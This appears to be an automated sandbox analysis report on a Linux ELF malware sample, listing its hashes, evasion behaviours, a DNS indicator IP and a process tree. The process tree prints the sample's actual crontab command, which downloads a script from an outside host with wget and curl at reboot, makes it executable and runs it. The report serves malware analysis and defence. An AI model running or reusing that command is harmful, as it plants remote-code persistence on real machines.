Analysis
max time kernel: 149s
max time network: 139s
platform: ubuntu-20.04_amd64
resource: ubuntu2004-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240611-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
submitted: 27-10-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Resource
ubuntu2004-amd64-20240611-en
General
Target: 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Size: 73KB
MD5: 47ee0b8842a526fc0c6ff94fe4ca2ad6
SHA1: adf64c9ff9b8d9897fddc7e3014b9c5aea88b964
SHA256: 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
SHA512: c4ff89dfd2609c7ae0dfa234855be1e0133e8af0bce3afed376135c370eec203ea32c45a1f1d23cbc713717efd36c860478efcfbd85377cd3d17d8051b8f8862
SSDEEP: 1536:BFEA/tr50yFqIWfWD7LnaItWpOIfFkDFD:BFEAVZRWfWTnaVEIf0FD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
pid: 1392  process: 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description: Destination IP  ioc: 152.53.15.127
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description: File opened for modification  ioc: /var/spool/cron/crontabs/tmp.1cgCnI  process: crontab
Changes its process name 1 IoCs
Processes:
description: Changes the process name, possibly in an attempt to hide itself  ioc: /bin/busybox ntpd  pid: 1392  process: 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Processes (every entry below was performed by 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf):
description: File opened for reading
ioc:
/proc/861/cmdline
/proc/270/cmdline
/proc/1458/status
/proc/1410/status
/proc/1368/cmdline
/proc/1431/status
/proc/1/cmdline
/proc/1454/status
/proc/1455/status
/proc/1459/status
/proc/1460/status
/proc/1463/status
/proc/1465/status
/proc/1405/status
/proc/1422/status
/proc/1432/status
/proc/1466/status
/proc/1457/status
/proc/1461/status
/proc/1462/status
/proc/1464/status
/proc/1467/status
/proc/mounts
/proc/1437/status
/proc/1456/status
/proc/1468/status
Processes
[1] /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    command line: /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    - Renames itself
    - Changes its process name
    - Reads runtime system information
    PID: 1392
  [2] /bin/sh
      command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      - File and Directory Permissions Modification
      PID: 1393
    [3] /usr/bin/crontab
        command line: crontab -
        - Creates/modifies Cron job
        PID: 1395
    [3] /usr/bin/crontab
        command line: crontab -l
        PID: 1396
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 306B
MD5: 050970160d674c8e3e883f557c869f9c
SHA1: 9f62fac10caa5e0f6f9642947ef6e7b8e3418dbc
SHA256: f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203
SHA512: 584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10